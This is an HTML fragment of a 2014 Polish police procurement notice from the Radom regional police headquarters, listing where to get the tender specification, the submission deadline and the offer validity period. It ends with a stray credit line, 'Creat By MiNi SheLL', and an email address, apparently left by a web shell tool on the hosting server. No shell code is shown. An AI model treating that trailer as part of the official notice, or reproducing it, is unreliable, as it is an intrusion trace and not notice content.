<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mazowiecka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji zs. w Radomiu ul. 11-go Listopada 37/59 26-600 Radom Sekcja Zamówień Publicznych KWP zs. w Radomiu pokój 801 /8-piętro/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2014 godzina 09:00, miejsce: Komenda Wojewódzka Policji zs. w Radomiu ul. 11-go Listopada 37/59 26-600 Radom Sekcja Zamówień Publicznych KWP zs. w Radomiu pokój 801 /8-piętro/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com